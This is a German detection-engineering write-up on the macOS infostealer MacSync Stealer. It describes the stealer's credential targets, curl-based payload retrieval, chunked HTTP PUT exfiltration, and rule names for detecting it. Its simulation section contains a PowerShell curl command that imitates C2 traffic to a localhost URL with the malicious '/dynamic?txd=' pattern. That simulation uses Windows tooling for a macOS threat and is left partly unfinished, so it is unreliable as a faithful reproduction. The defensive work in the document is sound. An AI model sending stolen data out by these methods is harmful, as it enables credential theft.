Verfolgung der MacSync Stealer-Infrastruktur durch Verhaltensanalyse
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
MacSync Stealer ist ein auf macOS ausgerichteter Informationsdieb, der auf rasch rotierende Command-and-Control-Infrastruktur angewiesen ist. Die Malware zielt auf wertvolle Daten ab, darunter Inhalte des macOS-Schlüsselbunds, Browser-Anmeldedaten, SSH-Schlüssel und Cloud-Anmeldeinformationen. Ihre skriptgesteuerte Angriffskette kombiniert Social Engineering, Payload-Abruf durch curl, und gestückelte Datenexfiltration mithilfe von HTTP PUT-Anfragen.
Untersuchung
Microsoft Defender-Experten identifizierten die Bedrohung, indem sie wiederkehrende Endpunkt- und Netzwerkverhaltensweisen korrelierten, anstatt sich auf statische Domänenindikatoren zu verlassen. Die Untersuchung verband über 30 Domänen, indem sie sich auf dauerhafte Verhaltensmerkmale wie spezifische URI-Pfade, macOS User-Agent-Strings und charakteristische Upload-Parameter konzentrierte. Diese Vorgehensweise ermöglichte es den Forschern, Aktivitäten vom anfänglichen Payload-Abruf über die Datenbereitstellung bis hin zur endgültigen Exfiltration zu verfolgen.
Abschwächung
Organisationen sollten das Risiko benutzerinitiierter Terminal-Ausführungen durch Sicherheitsbewusstsein und Plattformkontrollen, die verdächtige Kopier-und-Ausführoperationen einschränken, reduzieren. Der Schutz von Anmeldedatenspeichern wie dem macOS-Schlüsselbund und Browserprofilen vor unbefugtem Zugriff ist entscheidend. Die Überwachung verdächtiger Kombinationen aus macOS-Dienstprogrammen und ungewöhnlichen HTTP PUT-Uploads kann ebenfalls helfen, aktive Datenexfiltration zu erkennen.
Reaktion
Wenn MacSync Stealer-Aktivität festgestellt wird, sollten Responder verdächtige Shell- und AppleScript-Ausführungen mit ausgehender Netzwerk-Telemetrie korrelieren. Ermittler sollten die Erstellung von Archiven an temporären Standorten wie /tmp/ untersuchen und unbefugten Zugriff auf sensible Dateien identifizieren. Netzaktivitäten sollten auch auf curl Anfragen mit Upload-Kennungen wie upload_id, chunk_index, und total_chunks.
Angriffsablauf
Wir aktualisieren diesen Teil noch.
Erkennungen
Verdächtiger Curl-Ausführungsversuch [MacOS] (via cmdline)
Archiv wurde im temporären MacOS-Ordner erstellt (via file_event)
Erkennung von MacSync Stealer C2 und Datenexfiltrationsmustern [Webserver]
Erkennen von MacSync Stealer Initial Payload Retrieval und AppleScript-Ausführung [Linux Prozess-Erstellung]
Simulation der Ausführung
Voraussetzung: Die Telemetrie- & Baseline-Vorflugprüfung muss bestanden sein.
Grund: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und sollen die genaue Telemetrie erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.
-
Angriffsnarrativ & Befehle: Ein Angreifer hat den MacSync Stealer erfolgreich auf einem Ziel-Webserver bereitgestellt. Nachdem er Anmeldedaten und sensible Systeminformationen erfasst hat, versucht der Angreifer nun, diese Daten zu seinem Command-and-Control (C2)-Server zu exfiltrieren. Um in den Standard-Administrationsverkehr einzutauchen und nicht von einfachen signaturbasierten Tools entdeckt zu werden, nutzt der Angreifer
curl.exe, um die gestohlenen Daten zu senden. Sie hängen die spezifischen bösartigen URI-Parameter/dynamic?txd=an die Anfrage an, was das bekannte Erkennungszeichen der MacSync C2-Infrastruktur ist. -
Regressionstest-Skript:
# Simulationsskript zur Auslösung der MacSync Stealer C2-Erkennungsregel # Dieser Befehl verwendet curl, um einen simulierten C2-Endpunkt mit dem bösartigen URI-Muster zu treffen. $target_url = "http://127.0.0.1/dynamic?txd=malicious_payload_data" Write-Host "Simuliere MacSync Stealer C2-Kommunikation..." curl.exe $target_url -
Bereinigungskommandos:
# Durch diese Simulation werden keine persistente Dateien erstellt; # jedoch lokalen Verlauf bei Bedarf löschen. Clear-History